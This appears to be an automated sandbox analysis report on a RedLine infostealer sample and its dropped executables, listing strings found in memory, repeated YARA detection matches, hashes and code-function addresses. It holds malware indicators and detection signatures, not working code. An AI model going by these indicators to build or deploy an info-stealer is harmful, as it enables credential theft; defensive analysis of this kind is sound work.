Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: PO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: PO.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C773EA	0_2_00C773EA
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C79660	0_2_00C79660
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C74049	0_2_00C74049
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C749DC	0_2_00C749DC
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C83984	0_2_00C83984
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C8F14E	0_2_00C8F14E
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C84298	0_2_00C84298
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C7A23C	0_2_00C7A23C
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C84B02	0_2_00C84B02
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C8ECA0	0_2_00C8ECA0
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C7445B	0_2_00C7445B
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C74DD1	0_2_00C74DD1
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C71595	0_2_00C71595
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C846CD	0_2_00C846CD
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C83E80	0_2_00C83E80
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C877E0	0_2_00C877E0
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C93754	0_2_00C93754
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_01714CF8	7_2_01714CF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_017150B0	7_2_017150B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_017150A1	7_2_017150A1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D1772	7_2_074D1772
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D1780	7_2_074D1780
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D95D8	7_2_074D95D8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074DBFF8	7_2_074DBFF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D9E48	7_2_074D9E48
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D9E37	7_2_074D9E37
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074DBBC0	7_2_074DBBC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074DBBB0	7_2_074DBBB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D9A01	7_2_074D9A01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_074D9A10	7_2_074D9A10
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_0A722860	7_2_0A722860
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_014BE7B0	15_2_014BE7B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_014BDC90	15_2_014BDC90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06AC9630	15_2_06AC9630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06AC3720	15_2_06AC3720
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06AC4468	15_2_06AC4468
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06AC1210	15_2_06AC1210
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06ACDA30	15_2_06ACDA30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06ACD140	15_2_06ACD140
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 17_2_01034CF8	17_2_01034CF8
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 17_2_010350B0	17_2_010350B0
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 17_2_01032F40	17_2_01032F40
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 17_2_010350A1	17_2_010350A1
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 17_2_08F917C0	17_2_08F917C0
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_02DDE7B0	22_2_02DDE7B0
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_02DDDC90	22_2_02DDDC90
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068F9630	22_2_068F9630
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068F3720	22_2_068F3720
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068F4468	22_2_068F4468
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068FD528	22_2_068FD528
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068F1210	22_2_068F1210
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068FDA30	22_2_068FDA30
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068FEAC0	22_2_068FEAC0
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Code function: 22_2_068FEAD0	22_2_068FEAD0

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: String function: 00C81BC0 appears 44 times

Source: owKQ0b029a.exe, 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameWLZu.exe8 vs owKQ0b029a.exe

Source: owKQ0b029a.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
